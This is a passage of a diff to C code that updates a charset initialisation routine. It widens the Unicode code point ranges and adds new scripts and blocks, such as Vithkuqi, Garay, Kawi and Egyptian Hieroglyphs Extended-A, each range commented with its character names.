-	while (c <= 0x1df9)	// ..to COMBINING WIDE INVERTED BRIDGE BELOW
-		charset[i++] = c++;
-	c = 0x1dfb;		// from COMBINING DELETION MARK
 	while (c <= 0x1dff)	// ..to COMBINING RIGHT ARROWHEAD AND DOWN ARROWHEAD BELOW
 		charset[i++] = c++;
 // 1E00..1EFF; Latin Extended Additional
@@ -832,7 +826,7 @@ void init()
 		charset[i++] = c++;
 // 20A0..20CF; Currency Symbols
 	c = 0x20a0;		// from EURO-CURRENCY SIGN
-	while (c <= 0x20bf)	// ..to BITCOIN SIGN
+	while (c <= 0x20c0)	// ..to SOM SIGN
 		charset[i++] = c++;
 // 20D0..20FF; Combining Diacritical Marks for Symbols
 	c = 0x20d0;		// from COMBINING LEFT HARPOON ABOVE
@@ -860,7 +854,7 @@ void init()
 		charset[i++] = c++;
 // 2400..243F; Control Pictures
 	c = 0x2400;		// from SYMBOL FOR NULL
-	while (c <= 0x2426)	// ..to SYMBOL FOR SUBSTITUTE FORM TWO
+	while (c <= 0x2429)	// ..to SYMBOL FOR DELETE MEDIUM SHADE FORM
 		charset[i++] = c++;
 // 2440..245F; Optical Character Recognition
 	c = 0x2440;		// from OCR HOOK
@@ -926,10 +920,7 @@ void init()
 		charset[i++] = c++;
 // 2C00..2C5F; Glagolitic
 	c = 0x2c00;		// from GLAGOLITIC CAPITAL LETTER AZU
-	while (c <= 0x2c2e)	// ..to GLAGOLITIC CAPITAL LETTER LATINATE MYSLITE
-		charset[i++] = c++;
-	c = 0x2c30;		// from GLAGOLITIC SMALL LETTER AZU
-	while (c <= 0x2c5e)	// ..to GLAGOLITIC SMALL LETTER LATINATE MYSLITE
+	while (c <= 0x2c5f)	// ..to GLAGOLITIC SMALL LETTER CAUDATE CHRIVI
 		charset[i++] = c++;
 // 2C60..2C7F; Latin Extended-C
 	c = 0x2c60;		// from LATIN CAPITAL LETTER L WITH DOUBLE BAR
@@ -990,7 +981,7 @@ void init()
 		charset[i++] = c++;
 // 2E00..2E7F; Supplemental Punctuation
 	c = 0x2e00;		// from RIGHT ANGLE SUBSTITUTION MARKER
-	while (c <= 0x2e52)	// ..to TIRONIAN SIGN CAPITAL ET
+	while (c <= 0x2e5d)	// ..to OBLIQUE HYPHEN
 		charset[i++] = c++;
 // 2E80..2EFF; CJK Radicals Supplement
 	c = 0x2e80;		// from CJK RADICAL REPEAT
@@ -1005,7 +996,7 @@ void init()
 		charset[i++] = c++;
 // 2FF0..2FFF; Ideographic Description Characters
 	c = 0x2ff0;		// from IDEOGRAPHIC DESCRIPTION CHARACTER LEFT TO RIGHT
-	while (c <= 0x2ffb)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER OVERLAID
+	while (c <= 0x2fff)	// ..to IDEOGRAPHIC DESCRIPTION CHARACTER ROTATION
 		charset[i++] = c++;
 // 3000..303F; CJK Symbols and Punctuation
 	c = 0x3000;		// from IDEOGRAPHIC SPACE
@@ -1040,8 +1031,9 @@ void init()
 		charset[i++] = c++;
 // 31C0..31EF; CJK Strokes
 	c = 0x31c0;		// from CJK STROKE T
-	while (c <= 0x31e3)	// ..to CJK STROKE Q
+	while (c <= 0x31e5)	// ..to CJK STROKE SZP
 		charset[i++] = c++;
+	charset[i++] = 0x31ef;	// IDEOGRAPHIC DESCRIPTION CHARACTER SUBTRACTION
 // 31F0..31FF; Katakana Phonetic Extensions
 	c = 0x31f0;		// from KATAKANA LETTER SMALL KU
 	while (c <= 0x31ff)	// ..to KATAKANA LETTER SMALL RO
@@ -1067,7 +1059,7 @@ void init()
 		charset[i++] = c++;
 // 4E00..9FFF; CJK Unified Ideographs
 	c = 0x4e00;		// from <CJK Ideograph, First>
-	while (c <= 0x9ffc)	// ..to <CJK Ideograph, Last>
+	while (c <= 0x9fff)	// ..to <CJK Ideograph, Last>
 		charset[i++] = c++;
 // A000..A48F; Yi Syllables
 	c = 0xa000;		// from YI SYLLABLE IT
@@ -1099,12 +1091,14 @@ void init()
 		charset[i++] = c++;
 // A720..A7FF; Latin Extended-D
 	c = 0xa720;		// from MODIFIER LETTER STRESS AND HIGH TONE
-	while (c <= 0xa7bf)	// ..to LATIN SMALL LETTER GLOTTAL U
+	while (c <= 0xa7cd)	// ..to LATIN SMALL LETTER S WITH DIAGONAL STROKE
 		charset[i++] = c++;
-	c = 0xa7c2;		// from LATIN CAPITAL LETTER ANGLICANA W
-	while (c <= 0xa7ca)	// ..to LATIN SMALL LETTER S WITH SHORT STROKE OVERLAY
+	charset[i++] = 0xa7d0;	// LATIN CAPITAL LETTER CLOSED INSULAR G
+	charset[i++] = 0xa7d1;	// LATIN SMALL LETTER CLOSED INSULAR G
+	c = 0xa7d5;		// from LATIN SMALL LETTER DOUBLE WYNN
+	while (c <= 0xa7dc)	// ..to LATIN CAPITAL LETTER LAMBDA WITH STROKE
 		charset[i++] = c++;
-	c = 0xa7f5;		// from LATIN CAPITAL LETTER REVERSED HALF H
+	c = 0xa7f2;		// from MODIFIER LETTER CAPITAL C
 	while (c <= 0xa7ff)	// ..to LATIN EPIGRAPHIC LETTER ARCHAIC M
 		charset[i++] = c++;
 // A800..A82F; Syloti Nagri
@@ -1259,19 +1253,16 @@ void init()
 		charset[i++] = c++;
 // FB50..FDFF; Arabic Presentation Forms-A
 	c = 0xfb50;		// from ARABIC LETTER ALEF WASLA ISOLATED FORM
-	while (c <= 0xfbc1)	// ..to ARABIC SYMBOL SMALL TAH BELOW
+	while (c <= 0xfbc2)	// ..to ARABIC SYMBOL WASLA ABOVE
 		charset[i++] = c++;
 	c = 0xfbd3;		// from ARABIC LETTER NG ISOLATED FORM
-	while (c <= 0xfd3f)	// ..to ORNATE RIGHT PARENTHESIS
-		charset[i++] = c++;
-	c = 0xfd50;		// from ARABIC LIGATURE TEH WITH JEEM WITH MEEM INITIAL FORM
 	while (c <= 0xfd8f)	// ..to ARABIC LIGATURE MEEM WITH KHAH WITH MEEM INITIAL FORM
 		charset[i++] = c++;
 	c = 0xfd92;		// from ARABIC LIGATURE MEEM WITH JEEM WITH KHAH INITIAL FORM
 	while (c <= 0xfdc7)	// ..to ARABIC LIGATURE NOON WITH JEEM WITH YEH FINAL FORM
 		charset[i++] = c++;
 	c = 0xfdf0;		// from ARABIC LIGATURE SALLA USED AS KORANIC STOP SIGN ISOLATED FORM
-	while (c <= 0xfdfd)	// ..to ARABIC LIGATURE BISMILLAH AR-RAHMAN AR-RAHEEM
+	while (c <= 0xfdff)	// ..to ARABIC LIGATURE AZZA WA JALL
 		charset[i++] = c++;
 // FE00..FE0F; Variation Selectors
 	c = 0xfe00;		// from VARIATION SELECTOR-1
@@ -1444,6 +1435,33 @@ void init()
 	while (c <= 0x10563)	// ..to CAUCASIAN ALBANIAN LETTER KIW
 		charset[i++] = c++;
 	charset[i++] = 0x1056f;	// CAUCASIAN ALBANIAN CITATION MARK
+// 10570..105BF; Vithkuqi
+	c = 0x10570;		// from VITHKUQI CAPITAL LETTER A
+	while (c <= 0x1057a)	// ..to VITHKUQI CAPITAL LETTER GA
+		charset[i++] = c++;
+	c = 0x1057c;		// from VITHKUQI CAPITAL LETTER HA
+	while (c <= 0x1058a)	// ..to VITHKUQI CAPITAL LETTER RE
+		charset[i++] = c++;
+	c = 0x1058c;		// from VITHKUQI CAPITAL LETTER SE
+	while (c <= 0x10592)	// ..to VITHKUQI CAPITAL LETTER XE
+		charset[i++] = c++;
+	charset[i++] = 0x10594;	// VITHKUQI CAPITAL LETTER Y
+	charset[i++] = 0x10595;	// VITHKUQI CAPITAL LETTER ZE
+	c = 0x10597;		// from VITHKUQI SMALL LETTER A
+	while (c <= 0x105a1)	// ..to VITHKUQI SMALL LETTER GA
+		charset[i++] = c++;
+	c = 0x105a3;		// from VITHKUQI SMALL LETTER HA
+	while (c <= 0x105b1)	// ..to VITHKUQI SMALL LETTER RE
+		charset[i++] = c++;
+	c = 0x105b3;		// from VITHKUQI SMALL LETTER SE
+	while (c <= 0x105b9)	// ..to VITHKUQI SMALL LETTER XE
+		charset[i++] = c++;
+	charset[i++] = 0x105bb;	// VITHKUQI SMALL LETTER Y
+	charset[i++] = 0x105bc;	// VITHKUQI SMALL LETTER ZE
+// 105C0..105FF; Todhri
+	c = 0x105c0;		// from TODHRI LETTER A
+	while (c <= 0x105f3)	// ..to TODHRI LETTER OO
+		charset[i++] = c++;
 // 10600..1077F; Linear A
 	c = 0x10600;		// from LINEAR A SIGN AB001
 	while (c <= 0x10736)	// ..to LINEAR A SIGN A664
@@ -1454,6 +1472,16 @@ void init()
 	c = 0x10760;		// from LINEAR A SIGN A800
 	while (c <= 0x10767)	// ..to LINEAR A SIGN A807
 		charset[i++] = c++;
+// 10780..107BF; Latin Extended-F
+	c = 0x10780;		// from MODIFIER LETTER SMALL CAPITAL AA
+	while (c <= 0x10785)	// ..to MODIFIER LETTER SMALL B WITH HOOK
+		charset[i++] = c++;
+	c = 0x10787;		// from MODIFIER LETTER SMALL DZ DIGRAPH
+	while (c <= 0x107b0)	// ..to MODIFIER LETTER SMALL V WITH RIGHT HOOK
+		charset[i++] = c++;
+	c = 0x107b2;		// from MODIFIER LETTER SMALL CAPITAL Y
+	while (c <= 0x107ba)	// ..to MODIFIER LETTER SMALL S WITH CURL
+		charset[i++] = c++;
 // 10800..1083F; Cypriot Syllabary
 	c = 0x10800;		// from CYPRIOT SYLLABLE A
 	while (c <= 0x10805)	// ..to CYPRIOT SYLLABLE JA
@@ -1606,6 +1634,15 @@ void init()
 	c = 0x10d30;		// from HANIFI ROHINGYA DIGIT ZERO
 	while (c <= 0x10d39)	// ..to HANIFI ROHINGYA DIGIT NINE
 		charset[i++] = c++;
+// 10D40..10D8F; Garay
+	c = 0x10d40;		// from GARAY DIGIT ZERO
+	while (c <= 0x10d65)	// ..to GARAY CAPITAL LETTER OLD NA
+		charset[i++] = c++;
+	c = 0x10d69;		// from GARAY VOWEL SIGN E
+	while (c <= 0x10d85)	// ..to GARAY SMALL LETTER OLD NA
+		charset[i++] = c++;
+	charset[i++] = 0x10d8e;	// GARAY PLUS SIGN
+	charset[i++] = 0x10d8f;	// GARAY MINUS SIGN
 // 10E60..10E7F; Rumi Numeral Symbols
 	c = 0x10e60;		// from RUMI DIGIT ONE
 	while (c <= 0x10e7e)	// ..to RUMI FRACTION TWO THIRDS
@@ -1618,6 +1655,12 @@ void init()
 	charset[i++] = 0x10ead;	// YEZIDI HYPHENATION MARK
 	charset[i++] = 0x10eb0;	// YEZIDI LETTER LAM WITH DOT ABOVE
 	charset[i++] = 0x10eb1;	// YEZIDI LETTER YOT WITH CIRCUMFLEX ABOVE
+// 10EC0..10EFF; Arabic Extended-C
+	charset[i++] = 0x10ec2;	// ARABIC LETTER DAL WITH TWO DOTS VERTICALLY BELOW
+	charset[i++] = 0x10ec4;	// ARABIC LETTER KAF WITH TWO DOTS VERTICALLY BELOW
+	c = 0x10efc;		// from ARABIC COMBINING ALEF OVERLAY
+	while (c <= 0x10eff)	// ..to ARABIC SMALL LOW WORD MADDA
+		charset[i++] = c++;
 // 10F00..10F2F; Old Sogdian
 	c = 0x10f00;		// from OLD SOGDIAN LETTER ALEPH
 	while (c <= 0x10f27)	// ..to OLD SOGDIAN LIGATURE AYIN-DALETH
@@ -1626,6 +1669,10 @@ void init()
 	c = 0x10f30;		// from SOGDIAN LETTER ALEPH
 	while (c <= 0x10f59)	// ..to SOGDIAN PUNCTUATION HALF CIRCLE WITH DOT
 		charset[i++] = c++;
+// 10F70..10FAF; Old Uyghur
+	c = 0x10f70;		// from OLD UYGHUR LETTER ALEPH
+	while (c <= 0x10f89)	// ..to OLD UYGHUR PUNCTUATION FOUR DOTS
+		charset[i++] = c++;
 // 10FB0..10FDF; Chorasmian
 	c = 0x10fb0;		// from CHORASMIAN LETTER ALEPH
 	while (c <= 0x10fcb)	// ..to CHORASMIAN NUMBER ONE HUNDRED
@@ -1639,12 +1686,12 @@ void init()
 	while (c <= 0x1104d)	// ..to BRAHMI PUNCTUATION LOTUS
 		charset[i++] = c++;
 	c = 0x11052;		// from BRAHMI NUMBER ONE
-	while (c <= 0x1106f)	// ..to BRAHMI DIGIT NINE
+	while (c <= 0x11075)	// ..to BRAHMI LETTER OLD TAMIL LLA
 		charset[i++] = c++;
 	charset[i++] = 0x1107f;	// BRAHMI NUMBER JOINER
 // 11080..110CF; Kaithi
 	c = 0x11080;		// from KAITHI SIGN CANDRABINDU
-	while (c <= 0x110c1)	// ..to KAITHI DOUBLE DANDA
+	while (c <= 0x110c2)	// ..to KAITHI VOWEL SIGN VOCALIC R
 		charset[i++] = c++;
 	charset[i++] = 0x110cd;	// KAITHI NUMBER SIGN ABOVE
 // 110D0..110FF; Sora Sompeng
@@ -1678,7 +1725,7 @@ void init()
 	while (c <= 0x11211)	// ..to KHOJKI LETTER JJA
 		charset[i++] = c++;
 	c = 0x11213;		// from KHOJKI LETTER NYA
-	while (c <= 0x1123e)	// ..to KHOJKI SIGN SUKUN
+	while (c <= 0x11241)	// ..to KHOJKI VOWEL SIGN VOCALIC R
 		charset[i++] = c++;
 // 11280..112AF; Multani
 	c = 0x11280;		// from MULTANI LETTER A
@@ -1736,6 +1783,26 @@ void init()
 	c = 0x11370;		// from COMBINING GRANTHA LETTER A
 	while (c <= 0x11374)	// ..to COMBINING GRANTHA LETTER PA
 		charset[i++] = c++;
+// 11380..113FF; Tulu-Tigalari
+	c = 0x11380;		// from TULU-TIGALARI LETTER A
+	while (c <= 0x11389)	// ..to TULU-TIGALARI LETTER VOCALIC LL
+		charset[i++] = c++;
+	c = 0x11390;		// from TULU-TIGALARI LETTER OO
+	while (c <= 0x113b5)	// ..to TULU-TIGALARI LETTER LLLA
+		charset[i++] = c++;
+	c = 0x113b7;		// from TULU-TIGALARI SIGN AVAGRAHA
+	while (c <= 0x113c0)	// ..to TULU-TIGALARI VOWEL SIGN VOCALIC LL
+		charset[i++] = c++;
+	c = 0x113c7;		// from TULU-TIGALARI VOWEL SIGN OO
+	while (c <= 0x113ca)	// ..to TULU-TIGALARI SIGN CANDRA ANUNASIKA
+		charset[i++] = c++;
+	c = 0x113cc;		// from TULU-TIGALARI SIGN ANUSVARA
+	while (c <= 0x113d5)	// ..to TULU-TIGALARI DOUBLE DANDA
+		charset[i++] = c++;
+	charset[i++] = 0x113d7;	// TULU-TIGALARI SIGN OM PUSHPIKA
+	charset[i++] = 0x113d8;	// TULU-TIGALARI SIGN SHRII PUSHPIKA
+	charset[i++] = 0x113e1;	// TULU-TIGALARI VEDIC TONE SVARITA
+	charset[i++] = 0x113e2;	// TULU-TIGALARI VEDIC TONE ANUDATTA
 // 11400..1147F; Newa
 	c = 0x11400;		// from NEWA LETTER A
 	while (c <= 0x1145b)	// ..to NEWA PLACEHOLDER MARK
@@ -1770,12 +1837,16 @@ void init()
 		charset[i++] = c++;
 // 11680..116CF; Takri
 	c = 0x11680;		// from TAKRI LETTER A
-	while (c <= 0x116b8)	// ..to TAKRI LETTER ARCHAIC KHA
+	while (c <= 0x116b9)	// ..to TAKRI ABBREVIATION SIGN
 		charset[i++] = c++;
 	c = 0x116c0;		// from TAKRI DIGIT ZERO
 	while (c <= 0x116c9)	// ..to TAKRI DIGIT NINE
 		charset[i++] = c++;
-// 11700..1173F; Ahom
+// 116D0..116FF; Myanmar Extended-C
+	c = 0x116d0;		// from MYANMAR PAO DIGIT ZERO
+	while (c <= 0x116e3)	// ..to MYANMAR EASTERN PWO KAREN DIGIT NINE
+		charset[i++] = c++;
+// 11700..1174F; Ahom
 	c = 0x11700;		// from AHOM LETTER KA
 	while (c <= 0x1171a)	// ..to AHOM LETTER ALTERNATE BA
 		charset[i++] = c++;
@@ -1783,7 +1854,7 @@ void init()
 	while (c <= 0x1172b)	// ..to AHOM SIGN KILLER
 		charset[i++] = c++;
 	c = 0x11730;		// from AHOM DIGIT ZERO
-	while (c <= 0x1173f)	// ..to AHOM SYMBOL VI
+	while (c <= 0x11746)	// ..to AHOM LETTER LLA
 		charset[i++] = c++;
 // 11800..1184F; Dogra
 	c = 0x11800;		// from DOGRA LETTER A
@@ -1832,10 +1903,25 @@ void init()
 	c = 0x11a50;		// from SOYOMBO LETTER A
 	while (c <= 0x11aa2)	// ..to SOYOMBO TERMINAL MARK-2
 		charset[i++] = c++;
+// 11AB0..11ABF; Unified Canadian Aboriginal Syllabics Extended-A
+	c = 0x11ab0;		// from CANADIAN SYLLABICS NATTILIK HI
+	while (c <= 0x11abf)	// ..to CANADIAN SYLLABICS SPA
+		charset[i++] = c++;
 // 11AC0..11AFF; Pau Cin Hau
 	c = 0x11ac0;		// from PAU CIN HAU LETTER PA
 	while (c <= 0x11af8)	// ..to PAU CIN HAU GLOTTAL STOP FINAL
 		charset[i++] = c++;
+// 11B00..11B5F; Devanagari Extended-A
+	c = 0x11b00;		// from DEVANAGARI HEAD MARK
+	while (c <= 0x11b09)	// ..to DEVANAGARI SIGN MINDU
+		charset[i++] = c++;
+// 11BC0..11BFF; Sunuwar
+	c = 0x11bc0;		// from SUNUWAR LETTER DEVI
+	while (c <= 0x11be1)	// ..to SUNUWAR SIGN PVO
+		charset[i++] = c++;
+	c = 0x11bf0;		// from SUNUWAR DIGIT ZERO
+	while (c <= 0x11bf9)	// ..to SUNUWAR DIGIT NINE
+		charset[i++] = c++;
 // 11C00..11C6F; Bhaiksuki
 	c = 0x11c00;		// from BHAIKSUKI LETTER A
 	while (c <= 0x11c08)	// ..to BHAIKSUKI LETTER VOCALIC L
@@ -1897,6 +1983,16 @@ void init()
 	c = 0x11ee0;		// from MAKASAR LETTER KA
 	while (c <= 0x11ef8)	// ..to MAKASAR END OF SECTION
 		charset[i++] = c++;
+// 11F00..11F5F; Kawi
+	c = 0x11f00;		// from KAWI SIGN CANDRABINDU
+	while (c <= 0x11f10)	// ..to KAWI LETTER O
+		charset[i++] = c++;
+	c = 0x11f12;		// from KAWI LETTER KA
+	while (c <= 0x11f3a)	// ..to KAWI VOWEL SIGN VOCALIC R
+		charset[i++] = c++;
+	c = 0x11f3e;		// from KAWI VOWEL SIGN E
+	while (c <= 0x11f5a)	// ..to KAWI SIGN NUKTA
+		charset[i++] = c++;
 // 11FB0..11FBF; Lisu Supplement
 	charset[i++] = 0x11fb0;	// LISU LETTER YHA
 // 11FC0..11FFF; Tamil Supplement
@@ -1919,18 +2015,30 @@ void init()
 	c = 0x12480;		// from CUNEIFORM SIGN AB TIMES NUN TENU
 	while (c <= 0x12543)	// ..to CUNEIFORM SIGN ZU5 TIMES THREE DISH TENU
 		charset[i++] = c++;
+// 12F90..12FFF; Cypro-Minoan
+	c = 0x12f90;		// from CYPRO-MINOAN SIGN CM001
+	while (c <= 0x12ff2)	// ..to CYPRO-MINOAN SIGN CM302
+		charset[i++] = c++;
 // 13000..1342F; Egyptian Hieroglyphs
 	c = 0x13000;		// from EGYPTIAN HIEROGLYPH A001
-	while (c <= 0x1342e)	// ..to EGYPTIAN HIEROGLYPH AA032
+	while (c <= 0x1342f)	// ..to EGYPTIAN HIEROGLYPH V011D
 		charset[i++] = c++;
-// 13430..1343F; Egyptian Hieroglyph Format Controls
+// 13430..1345F; Egyptian Hieroglyph Format Controls
 	c = 0x13430;		// from EGYPTIAN HIEROGLYPH VERTICAL JOINER
-	while (c <= 0x13438)	// ..to EGYPTIAN HIEROGLYPH END SEGMENT
+	while (c <= 0x13455)	// ..to EGYPTIAN HIEROGLYPH MODIFIER DAMAGED
+		charset[i++] = c++;
+// 13460..143FF; Egyptian Hieroglyphs Extended-A
+	c = 0x13460;		// from EGYPTIAN HIEROGLYPH-13460
+	while (c <= 0x143fa)	// ..to EGYPTIAN HIEROGLYPH-143FA
 		charset[i++] = c++;
 // 14400..1467F; Anatolian Hieroglyphs
 	c = 0x14400;		// from ANATOLIAN HIEROGLYPH A001
 	while (c <= 0x14646)	// ..to ANATOLIAN HIEROGLYPH A530
 		charset[i++] = c++;
+// 16100..1613F; Gurung Khema
+	c = 0x16100;		// from GURUNG KHEMA LETTER A
+	while (c <= 0x16139)	// ..to GURUNG KHEMA DIGIT NINE
+		charset[i++] = c++;
 // 16800..16A3F; Bamum Supplement
 	c = 0x16800;		// from BAMUM LETTER PHASE-A NGKUE MFON
 	while (c <= 0x16a38)	// ..to BAMUM LETTER PHASE-F VUEQ
@@ -1944,6 +2052,13 @@ void init()
 		charset[i++] = c++;
 	charset[i++] = 0x16a6e;	// MRO DANDA
 	charset[i++] = 0x16a6f;	// MRO DOUBLE DANDA
+// 16A70..16ACF; Tangsa
+	c = 0x16a70;		// from TANGSA LETTER OZ
+	while (c <= 0x16abe)	// ..to TANGSA LETTER ZA
+		charset[i++] = c++;
+	c = 0x16ac0;		// from TANGSA DIGIT ZERO
+	while (c <= 0x16ac9)	// ..to TANGSA DIGIT NINE
+		charset[i++] = c++;
 // 16AD0..16AFF; Bassa Vah
 	c = 0x16ad0;		// from BASSA VAH LETTER ENNI
 	while (c <= 0x16aed)	// ..to BASSA VAH LETTER I
@@ -1967,6 +2082,10 @@ void init()
 	c = 0x16b7d;		// from PAHAWH HMONG CLAN SIGN TSHEEJ
 	while (c <= 0x16b8f)	// ..to PAHAWH HMONG CLAN SIGN VWJ
 		charset[i++] = c++;
+// 16D40..16D7F; Kirat Rai
+	c = 0x16d40;		// from KIRAT RAI SIGN ANUSVARA
+	while (c <= 0x16d79)	// ..to KIRAT RAI DIGIT NINE
+		charset[i++] = c++;
 // 16E40..16E9F; Medefaidrin
 	c = 0x16e40;		// from MEDEFAIDRIN CAPITAL LETTER M
 	while (c <= 0x16e9a)	// ..to MEDEFAIDRIN EXCLAMATION OH
@@ -1999,17 +2118,27 @@ void init()
 	c = 0x18b00;		// from KHITAN SMALL SCRIPT CHARACTER-18B00
 	while (c <= 0x18cd5)	// ..to KHITAN SMALL SCRIPT CHARACTER-18CD5
 		charset[i++] = c++;
-// 18D00..18D8F; Tangut Supplement
+	charset[i++] = 0x18cff;	// KHITAN SMALL SCRIPT CHARACTER-18CFF
+// 18D00..18D7F; Tangut Supplement
 	c = 0x18d00;		// from <Tangut Ideograph Supplement, First>
 	while (c <= 0x18d08)	// ..to <Tangut Ideograph Supplement, Last>
 		charset[i++] = c++;
+// 1AFF0..1AFFF; Kana Extended-B
+	c = 0x1aff0;		// from KATAKANA LETTER MINNAN TONE-2
+	while (c <= 0x1aff3)	// ..to KATAKANA LETTER MINNAN TONE-5
+		charset[i++] = c++;
+	c = 0x1aff5;		// from KATAKANA LETTER MINNAN TONE-7
+	while (c <= 0x1affb)	// ..to KATAKANA LETTER MINNAN NASALIZED TONE-5
+		charset[i++] = c++;
+	charset[i++] = 0x1affd;	// KATAKANA LETTER MINNAN NASALIZED TONE-7
+	charset[i++] = 0x1affe;	// KATAKANA LETTER MINNAN NASALIZED TONE-8
 // 1B000..1B0FF; Kana Supplement
 	c = 0x1b000;		// from KATAKANA LETTER ARCHAIC E
 	while (c <= 0x1b0ff)	// ..to HENTAIGANA LETTER RE-2
 		charset[i++] = c++;
 // 1B100..1B12F; Kana Extended-A
 	c = 0x1b100;		// from HENTAIGANA LETTER RE-3
-	while (c <= 0x1b11e)	// ..to HENTAIGANA LETTER N-MU-MO-2
+	while (c <= 0x1b122)	// ..to KATAKANA LETTER ARCHAIC WU
 		charset[i++] = c++;
 // 1B130..1B16F; Small Kana Extension
 	charset[i++] = 0x1b150;	// HIRAGANA LETTER SMALL WI
@@ -2041,6 +2170,23 @@ void init()
 	c = 0x1bca0;		// from SHORTHAND FORMAT LETTER OVERLAP
 	while (c <= 0x1bca3)	// ..to SHORTHAND FORMAT UP STEP
 		charset[i++] = c++;
+// 1CC00..1CEBF; Symbols for Legacy Computing Supplement
+	c = 0x1cc00;		// from UP-POINTING GO-KART
+	while (c <= 0x1ccf9)	// ..to OUTLINED DIGIT NINE
+		charset[i++] = c++;
+	c = 0x1cd00;		// from BLOCK OCTANT-3
+	while (c <= 0x1ceb3)	// ..to BLACK RIGHT TRIANGLE CARET
+		charset[i++] = c++;
+// 1CF00..1CFCF; Znamenny Musical Notation
+	c = 0x1cf00;		// from ZNAMENNY COMBINING MARK GORAZDO NIZKO S KRYZHEM ON LEFT
+	while (c <= 0x1cf2d)	// ..to ZNAMENNY COMBINING MARK KRYZH ON LEFT
+		charset[i++] = c++;
+	c = 0x1cf30;		// from ZNAMENNY COMBINING TONAL RANGE MARK MRACHNO
+	while (c <= 0x1cf46)	// ..to ZNAMENNY PRIZNAK MODIFIER ROG
+		charset[i++] = c++;
+	c = 0x1cf50;		// from ZNAMENNY NEUME KRYUK
+	while (c <= 0x1cfc3)	// ..to ZNAMENNY NEUME PAUK
+		charset[i++] = c++;
 // 1D000..1D0FF; Byzantine Musical Symbols
 	c = 0x1d000;		// from BYZANTINE MUSICAL SYMBOL PSILI
 	while (c <= 0x1d0f5)	// ..to BYZANTINE MUSICAL SYMBOL GORGON NEO KATO
@@ -2050,12 +2196,16 @@ void init()
 	while (c <= 0x1d126)	// ..to MUSICAL SYMBOL DRUM CLEF-2
 		charset[i++] = c++;
 	c = 0x1d129;		// from MUSICAL SYMBOL MULTIPLE MEASURE REST
-	while (c <= 0x1d1e8)	// ..to MUSICAL SYMBOL KIEVAN FLAT SIGN
+	while (c <= 0x1d1ea)	// ..to MUSICAL SYMBOL KORON
 		charset[i++] = c++;
 // 1D200..1D24F; Ancient Greek Musical Notation
 	c = 0x1d200;		// from GREEK VOCAL NOTATION SYMBOL-1
 	while (c <= 0x1d245)	// ..to GREEK MUSICAL LEIMMA
 		charset[i++] = c++;
+// 1D2C0..1D2DF; Kaktovik Numerals
+	c = 0x1d2c0;		// from KAKTOVIK NUMERAL ZERO
+	while (c <= 0x1d2d3)	// ..to KAKTOVIK NUMERAL NINETEEN
+		charset[i++] = c++;
 // 1D2E0..1D2FF; Mayan Numerals
 	c = 0x1d2e0;		// from MAYAN NUMERAL ZERO
 	while (c <= 0x1d2f3)	// ..to MAYAN NUMERAL NINETEEN
@@ -2131,6 +2281,13 @@ void init()
 	c = 0x1daa1;		// from SIGNWRITING ROTATION MODIFIER-2
 	while (c <= 0x1daaf)	// ..to SIGNWRITING ROTATION MODIFIER-16
 		charset[i++] = c++;
+// 1DF00..1DFFF; Latin Extended-G
+	c = 0x1df00;		// from LATIN SMALL LETTER FENG DIGRAPH WITH TRILL
+	while (c <= 0x1df1e)	// ..to LATIN SMALL LETTER S WITH CURL
+		charset[i++] = c++;
+	c = 0x1df25;		// from LATIN SMALL LETTER D WITH MID-HEIGHT LEFT HOOK
+	while (c <= 0x1df2a)	// ..to LATIN SMALL LETTER T WITH MID-HEIGHT LEFT HOOK
+		charset[i++] = c++;
 // 1E000..1E02F; Glagolitic Supplement
 	c = 0x1e000;		// from COMBINING GLAGOLITIC LETTER AZU
 	while (c <= 0x1e006)	// ..to COMBINING GLAGOLITIC LETTER ZHIVETE
@@ -2146,6 +2303,11 @@ void init()
 	c = 0x1e026;		// from COMBINING GLAGOLITIC LETTER YO
 	while (c <= 0x1e02a)	// ..to COMBINING GLAGOLITIC LETTER FITA
 		charset[i++] = c++;
+// 1E030..1E08F; Cyrillic Extended-D
+	c = 0x1e030;		// from MODIFIER LETTER CYRILLIC SMALL A
+	while (c <= 0x1e06d)	// ..to MODIFIER LETTER CYRILLIC SMALL STRAIGHT U WITH STROKE
+		charset[i++] = c++;
+	charset[i++] = 0x1e08f;	// COMBINING CYRILLIC SMALL LETTER BYELORUSSIAN-UKRAINIAN I
 // 1E100..1E14F; Nyiakeng Puachue Hmong
 	c = 0x1e100;		// from NYIAKENG PUACHUE HMONG LETTER MA
 	while (c <= 0x1e12c)	// ..to NYIAKENG PUACHUE HMONG LETTER W
@@ -2158,11 +2320,36 @@ void init()
 		charset[i++] = c++;
 	charset[i++] = 0x1e14e;	// NYIAKENG PUACHUE HMONG LOGOGRAM NYAJ
 	charset[i++] = 0x1e14f;	// NYIAKENG PUACHUE HMONG CIRCLED CA
+// 1E290..1E2BF; Toto
+	c = 0x1e290;		// from TOTO LETTER PA
+	while (c <= 0x1e2ae)	// ..to TOTO SIGN RISING TONE
+		charset[i++] = c++;
 // 1E2C0..1E2FF; Wancho
 	c = 0x1e2c0;		// from WANCHO LETTER AA
 	while (c <= 0x1e2f9)	// ..to WANCHO DIGIT NINE
 		charset[i++] = c++;
 	charset[i++] = 0x1e2ff;	// WANCHO NGUN SIGN
+// 1E4D0..1E4FF; Nag Mundari
+	c = 0x1e4d0;		// from NAG MUNDARI LETTER O
+	while (c <= 0x1e4f9)	// ..to NAG MUNDARI DIGIT NINE
+		charset[i++] = c++;
+// 1E5D0..1E5FF; Ol Onal
+	c = 0x1e5d0;		// from OL ONAL LETTER O
+	while (c <= 0x1e5fa)	// ..to OL ONAL DIGIT NINE
+		charset[i++] = c++;
+	charset[i++] = 0x1e5ff;	// OL ONAL ABBREVIATION SIGN
+// 1E7E0..1E7FF; Ethiopic Extended-B
+	c = 0x1e7e0;		// from ETHIOPIC SYLLABLE HHYA
+	while (c <= 0x1e7e6)	// ..to ETHIOPIC SYLLABLE HHYO
+		charset[i++] = c++;
+	c = 0x1e7e8;		// from ETHIOPIC SYLLABLE GURAGE HHWA
+	while (c <= 0x1e7eb)	// ..to ETHIOPIC SYLLABLE HHWE
+		charset[i++] = c++;
+	charset[i++] = 0x1e7ed;	// ETHIOPIC SYLLABLE GURAGE MWI
+	charset[i++] = 0x1e7ee;	// ETHIOPIC SYLLABLE GURAGE MWEE
+	c = 0x1e7f0;		// from ETHIOPIC SYLLABLE GURAGE QWI
+	while (c <= 0x1e7fe)	// ..to ETHIOPIC SYLLABLE GURAGE PWEE
+		charset[i++] = c++;
 // 1E800..1E8DF; Mende Kikakui
 	c = 0x1e800;		// from MENDE KIKAKUI SYLLABLE M001 KI
